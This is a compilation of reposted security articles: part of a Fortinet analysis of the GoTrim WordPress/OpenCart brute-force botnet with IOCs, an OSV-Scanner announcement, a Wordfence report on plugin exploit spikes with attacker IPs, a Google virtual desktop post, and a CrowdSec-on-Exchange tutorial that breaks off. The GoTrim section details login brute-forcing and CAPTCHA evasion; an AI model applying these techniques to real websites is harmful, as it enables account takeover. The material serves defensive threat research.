a. Target List: This is GZIP-compressed data, which, when decompressed, contains a list of domains that will be the target for the login attempts.
b. Command Option 1 (redacted): This option contains the username for authentication commands. Instead of using the same username for each domain, the C2 server can specify a series of bytes, like C2 A9 64, to use the domain as the username.
c. Command Option 2 (redacted): For authentication commands, this option contains the password
d. Command Option 3: Unknown option for WordPress authentication
e. Command Option 4: Option for WordPress authentication to use either POST request or XML-RPC when submitting credentials.

5. Internal Values: Numeric values that are not used by the malware itself (e.g., 42 and 255) and likely represent internal tasking IDs for the current command.    

The malware supports the following commands:

  • 1: Validate provided credentials against WordPress domains
  • 2: Validate provided credentials against Joomla! domains (currently not implemented)
  • 3: Validate provided credentials against OpenCart domains
  • 4: Validate provided credentials against Data Life Engine domains (currently not implemented)
  • 10: Detect WordPress, Joomla!, OpenCart, or Data Life Engine CMS installation on the domain
  • 11: Terminate the malware

We have observed a target list containing up to 30,000 domains in a single WordPress authentication command. Additionally, we observed that authentication commands only provide a single password to test against all the domains in the list. As mentioned above, brute forcing is likely distributed by commanding a network of infected machines to test different domains and credentials.

After the malware has completed processing a command, it sleeps for a while before sending another POST request to receive a new task from the C2 server.

Server Mode

In server mode, GoTrim starts a server on a random port between 4000 to 7999 to respond to incoming POST requests sent by the threat actor. This mode gives the threat actor a more responsive way of communicating with the bot. For instance, the status of the bots can be checked by the threat actor without waiting for the subsequent beacon request by simply sending a POST request to a specific URL handled by the bot’s HTTP server.

To issue a command to the machine, the threat actor sends a POST request to “/BOT_ID?lert=1” with the body containing the AES-256-GCM encrypted command data, similar to the response provided by the C2 server when the client requests commands (Figure 4). Server mode supports the same commands as client mode.

The threat actor can also send a request with the parameter “/BOT_ID?intval=1” to view the status of currently running tasks and whether assigned tasks have been completed.

When CPU utilization is below a certain level (75% or 90%, depending on the number of concurrent workers used for the current task), a separate goroutine is spawned to process each domain.

Botnet Commands

Detect CMS

GoTrim attempts to identify whether one of the four CMSes (WordPress, Joomla!, OpenCart, or DataLife Engine) is being used on the target website. It does this by checking for specific strings in the webpage content.

Interestingly, it only targets self-hosted WordPress websites by checking the Referer HTTP header for “wordpress.com”. As managed WordPress hosting providers, such as wordpress.com, usually implement more security measures to monitor, detect, and block brute forcing attempts than self-hosted WordPress websites, the chance of success is not worth the risk of getting discovered.

The strings used for determining the installed CMS are listed below.

WordPress

  • “wp-content/plugins/” and “wp-content/themes/”
  • “wp-content/uploads/”
  • “wp-includes/js/”
  • “/xmlrpc.php”

Joomla!

  • “generator” content=\”Joomla!” AND “/templates/”
  • “/media/system/js/mootools.js” AND “/media/system/js/caption.js”
  • “index.php?option=com_”
  • “/modules/mod_”
  • “/components/com_”

OpenCart

  • “/index.php?route=common” and “/index.php?route=information”
  • “image/cache/catalog”
  • “catalog/view/theme/”
  • “catalog/view/javascript”

DataLife Engine

  • “DataLife Engine” and “~engine/classes/js/dle_js.js”
  • “index.php?do=search&amp;”
  • “var dle_”

While GoTrim can detect websites using the four CMSes above, it currently only supports authenticating against WordPress and OpenCart websites. This indicates that this botnet is still under development.

Validate WordPress Credentials

Aside from the username provided by the C2 server, it attempts to gather more usernames by sending a GET request to “/wp-json/wp/v2/users”.

After that, it tries to log in to the WordPress website using the list of usernames and the password provided in the C2 command by sending a POST request to “/wp-login.php”. Figure 5 shows an example of the POST request for logging in.

Screenshot of Figure 5: WordPress authentication requestFigure 5: WordPress authentication request

This request causes a redirect to the admin page of the WordPress website (i.e.,/wp-admin) after a successful login. To confirm that the login and redirection were successful, it checks to see if the response contains “id=\”adminmenumain\”.

The C2 server can also specify the authentication to be performed via the WordPress XML-RPC feature, which is another way for users to programmatically interact with the CMS remotely using XML. By communicating directly with the web server’s backend, anti-bot mechanisms such as captchas that usually work when accessing the website pages could be bypassed.

After a successful login, the following information (delimited by “|”) is updated into a global status message and sent with the following request to the C2 (client mode) or in the response to incoming requests (server mode):

  • Target URL
  • Username
  • Password
  • Command ID (1 for WordPress, 3 for OpenCart, etc.)
  • Brute force status (“0GOOD” for success)

Validate OpenCart Credentials

GoTrim can also brute force websites running the open-source e-commerce platform OpenCart.

It sends a GET request to the target’s “/admin/index.php” and collects the authentication-related tokens and headers needed for the login request. It then performs the actual authentication by sending a POST request to the same URL with form-encoded data containing the username and the password.

To verify that the login request was successful, it checks if the website returned an OpenCart user token by searching for “/dashboard&user_token=” and making sure the “redirect” value from the received data is not empty.

A valid authentication response should look like the following:

{“redirect”:”https://example.com/opencart/admin/index.php?route=common/dashboard&user_token=USER_TOKEN_HASH”}

Upon successful login, the global status message is updated for WordPress brute-forcing.

Anti-bot Checks

GoTrim can detect anti-bot techniques used by web hosting providers and CDNs, such as Cloudflare and SiteGround, and evade some of their simpler checks.

It tries to mimic legitimate requests from Mozilla Firefox on 64bit Windows by using the same HTTP headers sent by the browser and supporting the same content encoding algorithms: gzip, deflate, and Brotli.

For WordPress websites, it also detects whether CAPTCHA plugins are installed.

  • Google reCAPTCHA
  • reCAPTCHA by BestWebSoft
  • WP Limit Login Attempts
  • Shield Security Captcha
  • All in One Security (AIOS) Captcha
  • JetPack Captcha
  • Captcha by BestWebSoft

The malware contains code to solve the CAPTCHA for some of these plugins. However, we need to verify if the bypass techniques work. We determined that it cannot bypass Google, WP Limit Login Attempts, and Shield Security’s CAPTCHAs.

In general, for the security plugins it cannot bypass, it only reports them to the C2 server by updating the global status message with information similar to the data it sends during a successful login. But it uses “3GOOD” for the brute force status to indicate that credential validation was skipped.

On encountering websites that contain the string “1gb.ru” within the page content, GoTrim also sends the same “3GOOD” brute force status. This appears to be a conscious decision to avoid targeting websites hosted by this provider, but the intent remains unclear.

Campaign Updates

While searching for other samples related to this campaign, we found a PHP script and binary from September 2022 with different URLs “/selects?param=1” and “/selects?walert=1” on C2 server 89[.]208[.]107[.]12 (Figure 6). The PHP script we detect as PHP/GoTrim!tr.dldr uses the same installation method, with only the download URL varying across the samples we gathered.

Screenshot of Figure 6: Code snippet from Sep 2022 version with different C2 serversFigure 6: Code snippet from Sep 2022 version with different C2 servers

A version of the binary that appeared in November 2022 also updated its HTTP POST URLs (Figure 7). The beacon request URL “/selects?dram=1” and the command request URL “/selects?bilert=1” have been changed to “/route?index=1” and “/route?alert=1”, respectively. The encryption algorithm and keys used in the data transmission remain the same.

Screenshot of Figure 7: Wireshark capture of POST requests from two versions of GoTrimFigure 7: Wireshark capture of POST requests from two versions of GoTrim

Conclusion

Although this malware is still a work in progress, the fact that it has a fully functional WordPress brute forcer combined with its anti-bot evasion techniques makes it a threat to watch for—especially with the immense popularity of the WordPress CMS, which powers millions of websites globally.

Brute-forcing campaigns are dangerous as they may lead to server compromise and malware deployment. To mitigate this risk, website administrators should ensure that user accounts (especially administrator accounts) use strong passwords. Keeping the CMS software and associated plugins up to date also reduces the risk of malware infection by exploiting unpatched vulnerabilities.

FortiGuard Labs will continue to monitor GoTrim’s development.

Fortinet Protections

The FortiGuard Antivirus service detects and blocks this threat as ELF/GoTrim!tr and PHP/GoTrim!tr.dldr.

The FortiGuard AntiVirus service is supported by FortiGateFortiMailFortiClient, and FortiEDR, and the Fortinet AntiVirus engine is a part of each of those solutions. Customers running current AntiVirus updates are protected.

FortiGuard Labs provides the GoTrim.Botnet IPS signature against GoTrim C2 activity.

The FortiGuard Web Filtering Service blocks the C2 servers and download URLs cited in this report.

FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

IOCs

Files

646ea89512e15fce61079d8f82302df5742e8e6e6c672a3726496281ad9bfd8a

4b6d8590a2db42eda26d017a119287698c5b0ed91dd54222893f7164e40cb508

c33e50c3be111c1401037cb42a0596a123347d5700cee8c42b2bd30cdf6b3be3

71453640ebf7cf8c640429a605ffbf56dfc91124c4a35c2ca6e5ac0223f77532

3188cbe5b60ed7c22c0ace143681b1c18f0e06658a314bdc4c7c4b8f77394729

80fba2dcc7ea2e8ded32e8f6c145cf011ceb821e57fee383c02d4c5eaf8bbe00

De85f1916d6102fcbaceb9cef988fca211a9ea74599bf5c97a92039ccf2da5f7

2a0397adb55436efa86d8569f78af0934b61f5b430fa00b49aa20a4994b73f4b

Download URLs

hxxp://77[.]73[.]133[.]99/taka

hxxp://77[.]73[.]133[.]99/trester

hxxp://77[.]73[.]133[.]99/pause

C2

hxxp://77[.]73[.]133[.]99

hxxp://77[.]73[.]133[.]99/selects?dram=1

hxxp://77[.]73[.]133[.]99/selects?bilert=1

hxxp://77[.]73[.]133[.]99/route?index=1

hxxp://77[.]73[.]133[.]99/route?alert=1

hxxp://89[.]208[.]107[.]12

hxxp://89[.]208[.]107[.]12/selects?param=1

hxxp://89[.]208[.]107[.]12/selects?walert=1

Source :
https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites

Announcing OSV-Scanner: Vulnerability Scanner for Open Source

Posted by Rex Pan, software engineer, Google Open Source Security Team

Today, we’re launching the OSV-Scanner, a free tool that gives open source developers easy access to vulnerability information relevant to their project.

Last year, we undertook an effort to improve vulnerability triage for developers and consumers of open source software. This involved publishing the Open Source Vulnerability (OSV) schema and launching the OSV.dev service, the first distributed open source vulnerability database. OSV allows all the different open source ecosystems and vulnerability databases to publish and consume information in one simple, precise, and machine readable format.

The OSV-Scanner is the next step in this effort, providing an officially supported frontend to the OSV database that connects a project’s list of dependencies with the vulnerabilities that affect them.

OSV-Scanner

Software projects are commonly built on top of a mountain of dependencies—external software libraries you incorporate into a project to add functionalities without developing them from scratch. Each dependency potentially contains existing known vulnerabilities or new vulnerabilities that could be discovered at any time. There are simply too many dependencies and versions to keep track of manually, so automation is required.

Scanners provide this automated capability by matching your code and dependencies against lists of known vulnerabilities and notifying you if patches or updates are needed. Scanners bring incredible benefits to project security, which is why the 2021 U.S. Executive Order for Cybersecurity included this type of automation as a requirement for national standards on secure software development.

The OSV-Scanner generates reliable, high-quality vulnerability information that closes the gap between a developer’s list of packages and the information in vulnerability databases. Since the OSV.dev database is open source and distributed, it has several benefits in comparison with closed source advisory databases and scanners:

  • Each advisory comes from an open and authoritative source (e.g. the RustSec Advisory Database)
  • Anyone can suggest improvements to advisories, resulting in a very high quality database
  • The OSV format unambiguously stores information about affected versions in a machine-readable format that precisely maps onto a developer’s list of packages
  • The above all results in fewer, more actionable vulnerability notifications, which reduces the time needed to resolve them

Running OSV-Scanner on your project will first find all the transitive dependencies that are being used by analyzing manifests, SBOMs, and commit hashes. The scanner then connects this information with the OSV database and displays the vulnerabilities relevant to your project.

OSV-Scanner is also integrated into the OpenSSF Scorecard’s Vulnerabilities check, which will extend the analysis from a project’s direct vulnerabilities to also include vulnerabilities in all its dependencies. This means that the 1.2M projects regularly evaluated by Scorecard will have a more comprehensive measure of their project security.

What else is new for OSV?

The OSV project has made lots of progress since our last post in June last year. The OSV schema has seen significant adoption from vulnerability databases such as GitHub Security Advisories and Android Security Bulletins. Altogether OSV.dev now supports 16 ecosystems, including all major language ecosystems, Linux distributions (Debian and Alpine), as well as Android, Linux Kernel, and OSS-Fuzz. This means the OSV.dev database is now the biggest open source vulnerability database of its kind, with a total of over 38,000 advisories from 15,000 advisories a year ago.

The OSV.dev website also had a complete overhaul, and now has a better UI and provides more information on each vulnerability. Prominent open source projects have also started to rely on OSV.dev, such as DependencyTrack and Flutter.

What’s next?

There’s still a lot to do! Our plan for OSV-Scanner is not just to build a simple vulnerability scanner; we want to build the best vulnerability management tool—something that will also minimize the burden of remediating known vulnerabilities. Here are some of our ideas for achieving this:

  • The first step is further integrating with developer workflows by offering standalone CI actions, allowing for easy setup and scheduling to keep track of new vulnerabilities.
  • Improve C/C++ vulnerability support: One of the toughest ecosystems for vulnerability management is C/C++, due to the lack of a canonical package manager to identify C/C++ software. OSV is filling this gap by building a high quality database of C/C++ vulnerabilities by adding precise commit level metadata to CVEs.
  • We are also looking to add unique features to OSV-Scanner, like the ability to utilize specific function level vulnerability information by doing call graph analysis, and to be able to automatically remediate vulnerabilities by suggesting minimal version bumps that provide the maximal impact.
  • VEX support: Automatically generating VEX statements using, for example, call graph analysis.

Try out OSV-Scanner today!

You can download and try out OSV-Scanner on your projects by following instructions on our new website osv.dev. Or alternatively, to automatically run OSV-Scanner on your GitHub project, try Scorecard. Please feel free to let us know what you think! You can give us feedback either by opening an issue on our Github, or through the OSV mailing list.

Source :
https://security.googleblog.com/2022/12/announcing-osv-scanner-vulnerability.html

Spikes in Attacks Serve as a Reminder to Update Plugins

The Wordfence Threat Intelligence team continually monitors trends in the attack data we collect. Occasionally an unusual trend will arise from this data, and we have spotted one such trend standing out over the Thanksgiving holiday in the U.S. and the first weekend in December. Attack attempts have spiked for vulnerabilities in two plugins.

The larger spikes have been from attempts to exploit an arbitrary file upload vulnerability in Kaswara Modern VC Addons <= version 3.0.1, for which a rule was added to the Wordfence firewall and available to Wordfence PremiumWordfence Care, and Wordfence Response users on April 21, 2021 and released to users of Wordfence Free on May 21, 2021. The other vulnerability is an arbitrary file upload and arbitrary file deletion vulnerability in the Adning Advertising plugin with versions <= 1.5.5, with our firewall rule being added on June 25, 2020 and made available to free users on July 25, 2020.

Kaswara and Adning exploit attempts per day

One thing that makes these spikes interesting is the fact that they are occurring over holidays and weekends. The first spike began on November 24, 2022, which was the Thanksgiving holiday in the United States. This spike lasted for three days. The second spike looked a little different, starting on Saturday, December 3, 2022, dropping on Sunday, and finishing with its peak on Monday. These spikes serve as an important reminder that malicious actors are aware that website administrators are not paying as close attention to their sites on holidays and weekends. This makes holidays and weekends a desirable time for attacks to be attempted.

During these spikes, exploit attempts have been observed against the Kaswara vulnerability on 1,969,494 websites, and on 1,075,458 sites against the Adning vulnerability. In contrast, the normal volume of sites with exploit attempts being blocked is an average of 256,700 for the Kaswara vulnerability, and 374,801 for the Adning vulnerability.

Kaswara and Adning sites comparison with spikes

The Kaswara Modern VC Addons plugin had more than 10,000 installations at the time the vulnerability was disclosed on April 21, 2021, and has since been closed without a patch being released. As long as this plugin is installed, it leaves the site vulnerable to attacks that make it possible for unauthenticated attackers upload malicious files that could ultimately lead to a full site takeover due to the fact that the ability to upload PHP files to servers hosting WordPress makes remote code execution possible. Any WordPress website administrators who are still using the plugin should immediately remove the plugin and replace it with a suitable alternative if the functionality is still required for the site, even if you are protected by the Wordfence firewall, as the plugin has not been maintained and may contain other issues. We estimate that about 8,000 WordPress users are still impacted by a vulnerable version, making them an easy target.

The Adning Advertising plugin had more than 8,000 users when our Threat Intelligence team performed our initial investigation of vulnerability on June 24, 2020. After some analysis, we found two vulnerabilities in the plugin, one that would allow an unauthenticated attacker to upload arbitrary files, also leading to easy site takeover. We also found an unauthenticated arbitrary file deletion vulnerability that could just as easily be used for complete site compromise by deleting the wp-config.php file. After we notified the plugin’s author of the vulnerabilities, they quickly worked to release a patched version within 24 hours. Any users of the Adning Advertising plugin should immediately update to the latest version, currently 1.6.3, but version 1.5.6 is the minimum version that includes the patch. We estimate that about 680 WordPress users are still impacted by a vulnerable version of this plugin.

The key takeaway from these attack attempts is to make sure your website components are kept up to date with the latest security updates. When a theme or plugin, or even the WordPress core, has an update available, it should be updated as soon as safely possible for the website. Leaving unpatched vulnerabilities on the website opens a website up to possible attack.

Cyber Observables

The following are the common observables we have logged in these exploit attempts. If any of these are observed on a website or in logs, it is an indication that one of these vulnerabilities has been exploited. The IP addresses listed are specifically from the spikes we have seen over the Thanksgiving holiday and the first weekend in December.

Kaswara

Top ten IPs
  • 40.87.107.73
  • 65.109.128.42
  • 65.21.155.174
  • 65.108.251.64
  • 5.75.244.31
  • 65.109.137.44
  • 65.21.247.31
  • 49.12.184.76
  • 5.75.252.228
  • 5.75.252.229
Common Uploaded Filenames

There were quite a few variations of randomly named six-letter filenames, two are referenced below, but each one observed used the .zip extension.

  • a57bze8931.zip
  • bala.zip
  • jwoqrj.zip
  • kity.zip
  • nkhnhf.zip
Top Ten User-Agent Strings
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 X-Middleton/1
  • Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
  • Amazon CloudFront
  • Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
  • Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
  • Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
  • Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36

Adning

Top Ten IPs
  • 65.109.128.42
  • 65.108.251.64
  • 65.21.155.174
  • 5.75.244.31
  • 65.109.137.44
  • 65.21.247.31
  • 5.75.252.229
  • 65.109.138.122
  • 40.87.107.73
  • 49.12.184.76
Common Uploaded Filenames

Most observed exploit attempts against the Adning plugin appeared to be nothing more than probing for the vulnerability, but in one instance the following filename was observed as a payload.

  • files
Top Ten User-Agent Strings
  • python-requests/2.28.1
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
  • python-requests/2.28.1 X-Middleton/1
  • python-requests/2.26.0
  • python-requests/2.27.1
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; @longcat) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 X-Middleton/1
  • ALittle Client
Conclusion

In this post we discussed two vulnerabilities that have spiked over the past two weekends. Removing or updating vulnerable plugins is always the best solution, but a Web Application Firewall like the one provided by Wordfence is important to block exploit attempts and can even protect your site from attacks targeting unknown vulnerabilities. The Wordfence firewall protects all Wordfence users, including Wordfence FreeWordfence PremiumWordfence Care, and Wordfence Response, against these vulnerabilities. Even with this protection in place, these vulnerabilities are serious as they can lead to full site takeover, and the Kaswara Modern VC Addons should be immediately removed, and the Adning Advertising plugin should immediately be updated.

Source :
https://www.wordfence.com/blog/2022/12/spikes-in-attacks-serve-as-a-reminder-to-update-plugins/

Google’s Virtual Desktop of the Future

Nick Yeager

Manager, Google Computing

Did you know that most Google employees rely on virtual desktops to get their work done? This represents a paradigm shift in client computing at Google, and was especially critical during the pandemic and the remote work revolution. We’re excited to continue enabling our employees to be productive, anywhere! This post covers the history of virtual desktops and details the numerous benefits Google has seen from their implementation. 

https://storage.googleapis.com/gweb-cloudblog-publish/images/image3_6PhPZT5.max-2000x2000.png

Background

In 2018, Google began the development of virtual desktops in the cloud. A whitepaper was published detailing how virtual desktops were created with Google Cloud, running on Google Compute Engine, as an alternative to physical workstations. Further research had shown that it was feasible to move our physical workstation fleet to these virtual desktops in the cloud. The research began with user experience analysis – looking into how employee satisfaction of cloud workstations compared with physical desktops. Researchers found that user satisfaction of cloud desktops was higher than that of their physical desktop counterparts! This was a monumental moment for cloud-based client computing at Google, and this discovery led to additional analyses of Compute Engine to understand if it could become our preferred (virtual) workstation platform of the future.

Today, Google’s internal use of virtual desktops has increased dramatically. Employees all over the globe use a mix of virtual Linux and Windows desktops on Compute Engine to complete their work. Whether an employee is writing code, accessing production systems, troubleshooting issues, or driving productivity initiatives, virtual desktops are providing them with the compute they need to get their work done. Access to virtual desktops is simple: some employees access their virtual desktop instances via Secure Shell (SSH), while others use Chrome Remote Desktop — a graphical access tool. 

In addition to simplicity and accessibility, Google has realized a number of benefits from virtual desktops. We’ve seen an enhanced security posture, a boost to our sustainability initiatives, and a reduction in maintenance effort associated with our IT infrastructure. All these improvements were achieved while improving the user experience compared to our physical workstation fleet.

https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_0EHHfvd.max-2000x2000.jpg

Example of Google Data Center

Analyzing Cloud vs Physical Desktops

Let’s look deeper into the analysis Google performed to compare cloud virtual desktops and physical desktops. Researchers compared cloud and physical desktops on five core pillars: user experience, performance, sustainability, security, and efficiency.

https://storage.googleapis.com/gweb-cloudblog-publish/images/image4_6gvUvXe.max-1900x1900.png

User Experience

Before the transition to virtual desktops got underway, user experience researchers wanted to know more about how they would affect employee happiness. They discovered that employees embraced the benefits that virtual desktops offered. This included freeing up valuable desk space to provide an always-on, always available compute experience, accessible from anywhere in the world, and reduced maintenance overhead compared to physical desktops. 

Performance

From a performance perspective, cloud desktops are simply better than physical desktops. For example, running on Compute Engine makes it easy to spin-up on-demand virtual instances with predictable compute and performance – a task that is significantly more difficult with a physical workstation vendor. Virtual desktops rely on a mix of Virtual Machine (VM) families that Google developed based on the performance needs of our users. These include Google Compute Engine E2 high-efficiency instances, which employees might use for day-to-day tasks, to higher-performance N2/N2D instances, which employees might use for more demanding machine learning jobs. Compute Engine offers a VM shape for practically any computing workflow. Additionally, employees no longer have to worry about machine upgrades (to increase performance, for example) because our entire fleet of virtual desktops can be upgraded to new shapes (with more CPU and RAM) with a single config change and a simple reboot — all within a matter of minutes. Plus, Compute Engine continues to add features and new machine types, which means our capabilities only continue to grow in this space.

Sustainability

Google cares deeply about sustainability and has been carbon neutral since 2007. Moving from physical desktops to virtual desktops on Compute Engine brings us closer to Google sustainability goals of a net-neutral desktop computing fleet. Our internal facilities team has praised virtual desktops as a win for future workspace planning, because a reduction in physical workstations could also mean a reduction in first-time construction costs of new buildings, significant (up to 30%) campus energy reductions, and even further reductions in costs associated with HVAC needs and circuit size needs at our campuses. Lastly, a reduction in physical workstations also contributes to a reduction in physical e-waste and a reduction in the carbon associated with transporting workstations from their factory of origin to office locations. At Google’s scale, these changes lead to an immense win from a sustainability standpoint. 

Security

By their very nature, virtual desktops mitigate the ability for a bad actor to exfiltrate data or otherwise compromise physical desktop hardware since there is no desktop hardware to compromise in the first place. This means attacks such as USB attacks, evil maid attacks, and similar techniques for subverting security that require direct hardware access become worries of the past. Additionally, the transition to cloud-based virtual desktops also brings with it an enhanced security posture through the use of Google Cloud’s myriad security features including Confidential ComputingvTPMs, and more. 

Efficiency

In the past, it was not uncommon for employees to spend days waiting for IT to deliver new machines or fix physical workstations. Today, cloud-based desktops can be created instantaneously on-demand and resized on-demand. They are always accessible, and virtually immune from maintenance-related issues. IT no longer has to deal with concerns like warranty claims, break-fix issues, or recycling. This time savings enables IT to focus on higher priority initiatives all while reducing their workload. With an enterprise the size of Google, these efficiency wins added up quickly. 

Considerations to Keep in Mind

Although Google has seen significant benefits with virtual desktops, there are some considerations to keep in mind before deciding if they are right for your enterprise. First, it’s important to recognize that migrating to a virtual fleet requires a consistently reliable and performant client internet connection. For remote/global employees, it’s important they’re located geographically near a Google Cloud Region (to minimize latency). Additionally, there are cases where physical workstations are still considered vital. These cases include users who need USB and other direct I/O access for testing/debugging hardware and users who have ultra low-latency graphics/video editing or CAD simulation needs. Finally, to ensure interoperability between these virtual desktops and the rest of our computing fleet, we did have to perform some additional engineering tasks to integrate our asset management and other IT systems with the virtual desktops. Whether your enterprise needs such features and integration should be carefully analyzed before considering a solution such as this. However, should you ultimately conclude that cloud-based desktops are the solution for your enterprise, we’re confident you’ll realize many of the benefits we have!

Tying It All Together

Although moving Google employees to virtual desktops in the clouds was a significant engineering undertaking, the benefits have been just as significant.  Making this switch has boosted employee productivity and satisfaction, enhanced security, increased efficiency, and provided noticeable improvements in performance and user experience. In short, cloud-based desktops are helping us transform how Googlers get their work done. During the pandemic, we saw the benefits of virtual desktops in a critical time. Employees had access to their virtual desktop from anywhere in the world, which kept our workforce safer and reduced transmission vectors for COVID-19. We’re excited for a future where more and more of our employees are computing in the cloud as we continue to embrace the work-from-anywhere model and as we continue to add new features and enhanced capabilities to Compute Engine!

Source :
https://cloud.google.com/blog/topics/developers-practitioners/googles-virtual-desktop-future

How to Protect Your Microsoft Exchange Server 2019 with CrowdSec

Follow this step-by-step guide on installing CrowdSec on a Microsoft Exchange server to better protect against common cyberattacks and new threats.

This article is a direct translation of Florian Burnel’s article published on IT Connect. You can find the original article here.

We also have an article on installing CrowdSec on a Windows server with a tutorial on blocking brute force attacks on an RDP connection and blocking a scan of a website hosted on an IIS server.

I. Presentation

In this tutorial, we will dive into how to secure a Microsoft Exchange mail server with the CrowdSec collaborative firewall! Installing CrowdSec on a Microsoft Exchange server will allow you to protect against common attacks but also new threats.

A good example is the security breach ProxyNotShell which made headlines in October 2022: CrowdSec can detect exploit attempts and block malicious IP addresses, thanks to the fact that it contains a collection for IIS and attacks based on HTTP/HTTPS protocols. Other examples are more classic cases: brute force attacks on the Exchange webmail interface.

Due to how it functions, an Exchange server will be exposed to the Internet depending on the architecture of your IS (for example, the presence or absence of a reverse proxy). However, it must be able to communicate outward and also be reachable from the outside to send and receive emails to your users’ mailboxes.

This same server is also reachable through Webmail which allows users to check their emails from a browser. This implies the presence of an IIS web server that hosts both Webmail and Exchange Admin Center. Furthermore, when an Exchange server is compromised by a cyberattack, this mainly involves HTTP/HTTPS access: hence the interest in protecting yourself.

CrowdSec Windows - Protect OWA

This article is a continuation of my first article on installing an Exchange Server 2019 server. For the installation of the Microsoft Exchange Server itself, I invite you to read my previous tutorial.

In addition, I also encourage you to restrict access to the Exchange admin center.

II. Setting up CrowdSec on Windows

A. Installing the CrowdSec Agent

I already wrote about how to install CrowdSec on Windows in a previous article, but that was the Alpha version. Now, the CrowdSec agent for Windows is available in a stable version, which means that it is ready to be implemented in production.

Note: if you have previously installed the alpha version on your server, you must uninstall it before installing this new CrowdSec version.

First, you must download the MSI package from the official CrowdSec GitHub repository.

While it is installing, the CrowdSec MSI package will perform the following actions:

  • Install CrowdSec itself
  • Integrate the Windows Collection (details are available here)
  • Register the CrowdSec instance with the Central API
  • Register the CrowdSec service within Windows (automatic start)

Once done, begin the installation. Just follow the steps without making any changes. Then, allow about 2 minutes for the Agent to fully install. 

Install CrowdSec on Windows for Exchange Server

As soon as the CrowdSec Agent is in place, we have access to the “cscli” command line which allows you to manage your CrowdSec instance from it.

To list current collections:

cscli collections list

To list the current bouncers (none by default):

cscli bouncers list

CrowdSec Windows - List collections and bouncers

B. Installing the ISS Collection

On Windows, CrowdSec natively sets up the “crowdsecurity/windows“, but it is not enough to protect your Exchange server. We will need to add the IIS collection, which will also add two more collections to detect web attacks.

This collection is installed from this command:

cscli collections install crowdsecurity/iis

In just a few seconds after adding, we can list the installed collections to see the presence of the new collections.

CrowdSec Windows - Lister les collections

To justify what I said in the introduction about the ProxyNotShell vulnerability, we can look at the details of the “crowdsecurity/http-cve” collection. Here, we can see the presence of a detection scenario named “crowdsecurity/CVE-2022-41082” corresponding to this vulnerability.

cscli collections inspect crowdsecurity/http-cve

CrowdSec Windows - http-cve collection details

Let’s go to the next step.

C. Installing Windows Firewall Bouncer

Now, we must set up the “firewall” bouncer for Windows, otherwise, attacks will be detected, but not blocked. Click on the following link, then on the “Download” button to download the MSI package: https://hub.crowdsec.net/author/crowdsecurity/bouncers/cs-windows-firewall-bouncer

The installation is done in only a few clicks: just follow the wizard.

CrowdSec Windows - Installation du bouncer firewall

Once done, the command below will make it possible to see the presence of the bouncer.

cscli bouncers list

CrowdSec Windows - Lister les bouncers

Let’s go to the next step.

D. Add IIS log support

For CrowdSec to focus on the logs generated by IIS, and by extension, corresponding to the access to the OWA and ECP portals of Exchange, we must indicate to it the paths to the log files it will analyze.

To do this, you will need to edit the following: 

C:\ProgramData\CrowdSec\config\acquis.yaml

In order to add the following lines:

---
use_time_machine: true
filenames:
  - C:\inetpub\logs\LogFiles\*\*.log
labels:
  type: iis

You can see the presence of a “dynamic” path which is characterized by the presence of the wildcard character: “C:\inetpub\logs\LogFiles\*\*.log “. This value will allow CrowdSec to find and read log files located in the tree “C:\inetpub\logs\LogFiles\

In addition to the path to the log files, this configuration block we just added contains a parameter named use_time_machine. It is important because IIS does not write logs in real-time in the log file, but it writes new events in blocks, every minute. Thanks to this parameter, CrowdSec will read the date and time of each line to find its way and process the events chronologically, this avoids false positives. 

However, if you are not using the log files, but the event viewer, you should use this piece of code and not the one mentioned above:

---
source: wineventlog
event_channel: Microsoft-IIS-Logging/Logs
event_ids:  - 6200
event_level: information
labels:  
type: iis

Save the acquired.yaml file and you can close it.

Finally, we need to restart CrowdSec. This operation is done in PowerShell with this command:

Restart-Service crowdsec

CrowdSec setup is complete! Now let’s test it!

III. Is the Exchange server protected?

A. Brute force on OWA – Webmail Exchange 

